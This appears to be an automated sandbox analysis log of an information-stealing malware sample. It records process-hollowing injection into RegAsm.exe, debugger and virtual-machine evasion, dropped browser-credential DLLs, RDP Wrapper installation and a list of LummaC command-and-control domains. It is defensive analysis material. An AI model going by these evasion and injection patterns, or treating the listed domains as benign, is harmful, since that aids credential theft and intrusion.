Source: C:\ProgramData\GIEBGIIJDG.exe	Memory allocated: A20000 memory reserve \| memory write watch
Source: C:\ProgramData\GIEBGIIJDG.exe	Memory allocated: 23D0000 memory reserve \| memory write watch
Source: C:\ProgramData\GIEBGIIJDG.exe	Memory allocated: 43D0000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

10_2_0040180D

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userBGIJEGCGDG.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userBGIJEGCGDG.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userBGIJEGCGDG.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\BKFHCGIDBA.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\BKJJEBKKEH.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\GIEBGIIJDG.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\userBGIJEGCGDG.exe	Window / User API: threadDelayed 3098
Source: C:\Users\userBGIJEGCGDG.exe	Window / User API: threadDelayed 495

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 6.0 %

Source: C:\Users\user\Desktop\file.exe TID: 6528	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe TID: 2956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe TID: 2924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6096	Thread sleep time: -30000s >= -30000s
Source: C:\Users\userBGIJEGCGDG.exe TID: 2300	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\userBGIJEGCGDG.exe TID: 1868	Thread sleep count: 3098 > 30
Source: C:\Users\userBGIJEGCGDG.exe TID: 1868	Thread sleep count: 495 > 30
Source: C:\Users\userBGIJEGCGDG.exe TID: 7316	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\userBGIJEGCGDG.exe TID: 2300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\BKFHCGIDBA.exe TID: 8084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8108	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\BKJJEBKKEH.exe TID: 8180	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\GIEBGIIJDG.exe TID: 1248	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6096	Thread sleep count: 90 > 30

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

10_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040E430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_00414910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040BE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_004016D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040F6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	4_2_004138B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	4_2_00414570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	4_2_0040ED20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040DE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	10_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	10_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	10_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	10_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	10_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	10_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	10_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	10_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	10_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

10_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00401160 GetSystemInfo,ExitProcess,

4_2_00401160

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userBGIJEGCGDG.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userBGIJEGCGDG.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\userBGIJEGCGDG.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\BKFHCGIDBA.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\BKJJEBKKEH.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\GIEBGIIJDG.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: net1.exe, 0000002B.00000002.2425174072.0000000003158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators*K
Source: userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C43000.00000004.00000800.00020000.00000000.sdmp, userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002C47000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 0000002B.00000002.2425174072.0000000003158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *Hyper-V Administrators
Source: RegAsm.exe, 0000003D.00000002.3283819592.000000000110A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8Q
Source: RegAsm.exe, 0000003D.00000002.3283819592.000000000110A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000004.00000002.2536324223.000000000135D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2352606132.0000000001387000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2351016346.0000000001355000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3006610464.0000000001665000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000000A.00000002.2971689518.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: RegAsm.exe, 0000003D.00000002.3283819592.000000000110A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware*B
Source: userBGIJEGCGDG.exe, 00000012.00000002.2480925927.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: net1.exe, 0000002B.00000002.2425174072.0000000003158000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-85044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-85041
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-85055
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-86219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-85062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-84884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_4-85084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\drivers\tsusbhub.sys

System information queried: ModuleInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0041AD48

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

4_2_004045C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

4_2_00419860

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00419750 mov eax, dword ptr fs:[00000030h]	4_2_00419750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004014AD mov eax, dword ptr fs:[00000030h]	10_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0040148A mov eax, dword ptr fs:[00000030h]	10_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004014A2 mov eax, dword ptr fs:[00000030h]	10_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_00418599 mov eax, dword ptr fs:[00000030h]	10_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041859A mov eax, dword ptr fs:[00000030h]	10_2_0041859A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,

4_2_00417850

Source: C:\Users\userBGIJEGCGDG.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0041AD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041CEEA SetUnhandledExceptionFilter,	4_2_0041CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0041B33A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6C2DB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6C2DB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C48AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6C48AC62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042762E SetUnhandledExceptionFilter,	10_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD2C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_1FFD2C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD42AF SetUnhandledExceptionFilter,	10_2_1FFD42AF

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 5704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: userAFHDHCAAKE.exe PID: 7136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 528, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_02A62131 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02A62131

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\userAFHDHCAAKE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\userGCAEHDBAAE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\BKFHCGIDBA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\BKJJEBKKEH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: userGCAEHDBAAE.exe, 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: userGCAEHDBAAE.exe, 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: userGCAEHDBAAE.exe, 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: userGCAEHDBAAE.exe, 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: userGCAEHDBAAE.exe, 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: userGCAEHDBAAE.exe, 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: userGCAEHDBAAE.exe, 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: userGCAEHDBAAE.exe, 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop
Source: userGCAEHDBAAE.exe, 0000000D.00000002.2230154118.0000000003D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wallkedsleeoi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	4_2_00419600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	10_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,	10_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
